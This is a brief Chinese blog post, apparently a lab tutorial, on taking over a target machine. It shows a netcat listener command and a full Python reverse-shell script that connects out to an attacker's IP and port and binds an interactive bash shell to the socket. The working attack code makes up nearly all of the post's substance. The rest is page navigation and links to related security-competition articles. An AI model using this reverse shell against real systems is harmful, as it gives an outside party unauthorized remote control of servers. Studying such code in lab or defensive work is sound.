【网络安全】攻击机监听端口、靶机发起请求

已于 2024-05-21 20:07:37 修改
阅读量239 收藏 4
点赞数 10
分类专栏: 网络安全 文章标签: web安全 安全 RCE
于 2024-05-20 20:38:17 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/139073809
版权

文章目录

攻击机监听端口

在监听模式下(-l),以详细模式运行(-v),并监听在端口号为111(-p 111)的端口上,等待连接:

nc -lvvp 111
//nc是netcat命令的缩写

在这里插入图片描述

靶机发起请求

靶机通过执行Python脚本实现对攻击机的请求
脚本实现的功能:攻击机接管靶机

创建Python脚本:

vim test.py

内容如下:

import socket
import subprocess
import os

# 创建一个 TCP 套接字
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 连接指定的 IP 和端口
s.connect(("IP", 端口))

# 将套接字的文件描述符复制到标准输入、输出和错误
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# 调用 /bin/bash,启动一个交互式的 Bash shell
p = subprocess.call(["/bin/bash", "-i"])

在这里插入图片描述

运行Python脚本:

python test.py

此时靶机将向攻击机发起请求,攻击机即可接管该靶机服务器。

秋说
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 010-网络安全应急技术与实践(网络层-无线ARP欺骗与消息监听重现分析)
时光隧道
02-08 3万+
无线ARP欺骗(Wireless ARP Spoofing)是一种网络攻击方式,它利用ARP(地址解析协议)中的漏洞,欺骗通信双方,使其将通信数据发送给攻击者,从而实现中间人攻击。消息监听(Message Eavesdropping)则是指攻击者截获并监听通信双方之间的通信数据。以下是无线ARP欺骗与消息监听的重现分析过程:攻击者在同一局域网中启动无线ARP欺骗工具,如Ettercap、ARPwner等。攻击者扫描附近的无线网络,获取目标网络的SSID(无线网络名称)和MAC地址。
PWN靶机环境 网络安全
05-23
PWN靶机环境
2021年山东省职业院校技能大赛网络安全赛项C模块Linux靶机
04-29
(三)模块C CTF夺旗-攻击 (本模块200分) 一、项目和任务描述: 假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。 请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。 二、操作系统环境说明: 客户机操作系统:Windows 10/Windows7 靶机服务器操作系统:Linux/Windows 三、漏洞情况说明: 1.服务器中的漏洞可能是常规漏洞也可能是系统漏洞; 2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限; 3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限; 4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权; 5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞
靶机测试,网络安全,安全测试
04-20
靶机测试,网络安全,安全测试,
网络安全夺旗5个flag靶机详细实操教程
06-14
详细介绍从环境搭建到,攻破靶机的每一个详细步骤,命令,截图和部分原理解释,非常适合初学者联系用。参考引用了部分大牛的策略,但有所改进。
中职网络安全技能竞赛C模块靶机池扫描attack脚本
12-10
网络安全技能竞赛 省赛C模块 扫描靶机池号段与批量attack靶机get shell的python脚本
攻击机靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
网络安全专业名词解释
热门推荐
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解.
信息安全技术——渗透攻击
最新发布
weixin_65036715的博客
04-21 910
一、渗透攻击的介绍1.1 渗透攻击是什么意思渗透攻击(Penetration,也称“渗透测试”)是一种在授权的情况下,使用技术攻击、破解、测试和安全评估网络系统的安全控制的过程。它的目的是评估其安全防御力度,找出安全漏洞,以增强对黑客和攻击的间接抵御能力,以防止非授权的访问,保护网络系统的机密信息和数据安全。渗透攻击的基本思想是逐步有步骤地检查目标站点的所有可使用的服务,从而识别任何可能利用的漏洞和滥用点,并证实这些漏洞是否可能被利用来实现目标站点的渗透。
网络安全:常用协议
nnnooon的博客
07-08 2739
网络安全中常用协议详解
2021江西省网络安全B模块靶机(共五台)
06-20
2021江西省网络安全B模块靶机(共五台)均放在阿里云盘
网络攻防靶机-设计概要 V5.docx
09-06
网络安全、攻防靶机、设计概要
OWASP靶机、安全学习、测试
05-24
OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用...
jangow靶机攻击流程
03-24
jangow靶机攻击流程 2023.3学习总结
网络安全实验9 证书应用和证书管理
一半西瓜的博客
02-01 1728
赞赏码 & 联系方式 & 个人闲话 【实验名称】拒绝服务攻击 【实验目的】 1.理解带宽攻击原理 2.理解资源消耗攻击原理 3.掌握洪泛攻击网络行为特征 4.理解DDos攻击原理 5.掌握TFN2K攻击全过程 【实验原理】 一.SYN Flood攻击 Dos(Denial of Service)拒绝服务攻击是指在特定攻击发生后,被攻击的对象不能及时提...
vlunhub系列之presidential靶机
hanjinming110的博客
03-11 214
vlunhub系列之presidential靶机
网络攻击与防范—术语和工具介绍
qq_50860232的博客
12-29 3822
DDOS/sql注入/DDL注入/Script kiddie/肉鸡/蠕虫病毒/跨站XSS/渗透测试/提权/爆破/ARP欺骗/域名劫持/撞库/外挂/................
网络安全pikachu的zip靶机
10-31
网络安全pikachu的zip靶机
全国职业技能大赛网络安全赛卷server2263靶机
06-22
全国职业技能大赛网络安全赛卷server2263靶机是一个用于网络安全比赛的虚拟机器。该虚拟机器被用来测试比赛选手在网络安全方面的技能和知识水平。这个靶机含有多个系统漏洞及攻防场景,比赛选手需要在规定时间内对这些漏洞进行攻击和防范,以获取得分。这项赛事旨在提高网络安全领域的专业技能和实际操作能力,增强比赛选手的实战经验和解决问题的能力。全国职业技能大赛网络安全赛卷server2263靶机的使用也为企业和机构提供了一个实际应用与实战演习的平台,帮助他们提高网络安全水平和应对网络安全威胁的能力。在面对不断进化的网络安全威胁的时代里,这种比赛和靶机的应用成为了现代社会中不可或缺的一部分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值